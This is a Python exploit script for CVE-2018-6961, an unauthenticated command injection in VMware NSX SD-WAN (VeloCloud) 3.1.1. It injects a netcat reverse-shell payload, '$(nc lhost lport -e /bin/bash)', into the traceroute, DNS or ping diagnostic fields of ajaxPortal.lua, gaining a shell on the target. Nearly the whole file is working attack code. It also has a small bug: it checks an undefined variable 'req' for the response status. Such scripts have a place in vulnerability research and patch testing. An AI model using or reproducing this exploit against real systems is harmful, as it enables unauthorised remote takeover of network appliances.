#!/usr/bin/python
 
# CVE-2018-6961
# Vuln: Unauthenticated Command Injection
# Date: 12/september/2018
# Author: b0k@nRb || 
# Credit: Critical Start || https://www.criticalstart.com/2018/06/cve-2018-6961-unauthenticated-command-injection-vulnerability-in-vmware-nsx-sd-wan-by-velocloud/
# Vendor: https://www.vmware.com
# Tested on: 3.1.1
# Patched on: 3.1.2 || https://www.vmware.com/security/advisories/VMSA-2018-0011.html
  
import argparse
import requests
import sys
import collections
import subprocess

#Global Instructions 
parser = argparse.ArgumentParser()
parser.add_argument("--rhost", help = "Remote Host")
parser.add_argument("--interface", help = "Interface that has Internet Access (Example: ge1, ge1.401, ge2, ge2.2000)")
parser.add_argument('--lhost', help = 'Local Host')
parser.add_argument('--lport', help = 'Local Port')
parser.add_argument('--function', help = 'Function to abuse (example: traceroute, dns, ping)')
args = parser.parse_args()

rhost = args.rhost
interface = args.interface
lhost = args.lhost
lport = args.lport
function = args.function


def usage():
	print " ____        _         _   _      ____  "
	print "| __ )  ___ | | ___ __| \ | |_ __| __ ) "
	print "|  _ \ / _ \| |/ / '__|  \| | '__|  _ \ "
	print "| |_) | (_) |   <| |  | |\  | |  | |_) |"
	print "|____/ \___/|_|\_\_|  |_| \_|_|  |____/ "
	print " "
	print " Usage()"
	print "python exploit.py --rhost --interface --lhost --lport --function"
	print "{}{}          {}{}            {}{}            {}{}"
	print "python exploit.py --177.77.7.7 --inteface ge1 --lhost 172.20.10.10 --lport 443 --function traceroute"
	print "Like the example above ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^"

def main():
	if not len(sys.argv[5:]):
		usage()
	else:
		exploit()

def exploit():
	payload = "$(nc " + lhost + " " + lport + " -e /bin/bash)"
	url = "http://" + rhost + "/scripts/ajaxPortal.lua"
 	headers = [
	    ('User-Agent','Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0'),
	    ('Accept', 'application/json, text/javascript, */*; q=0.01'),
	    ('Accept-Language', 'en-US,en;q=0.5'),
	    ('Accept-Encoding', 'gzip, deflate'),
	    ('Referer','http://' + rhost + '/'),
	    ('Content-Type', 'application/x-www-form-urlencoded; charset=UTF-8'),
	    ('X-Requested-With', 'XMLHttpRequest'),
	    ('Cookie', 'culture=en-us'),
	    ('Connection', 'close')
	]
	headers = collections.OrderedDict(headers)

	if function == 'traceroute':
	    craftdata = "destination=8.8.8.8" + payload + "&source=" + interface + "&test=TRACEROUTE&requestTimeout=900&auth_token=&_cmd=run_diagnostic"
	elif function == 'dns':
	    craftdata = "name=google.com" + payload + "&test=DNS_TEST&requestTimeout=90&auth_token=&_cmd=run_diagnostic"
	else:
	    craftdata = "destination=8.8.8.8" + payload + "&source=" + interface + "&test=BASIC_PING&requestTimeout=90&auth_token=&_cmd=run_diagnostic"

	print "Exploiting..................."
	session = requests.Session()
	sendpost = requests.post(url, headers=headers, data=craftdata)
	if (req.status_code == 200):
	    print "Excelent.....Enjoy your shell"
	else:
	    print "Better check what you did"

main()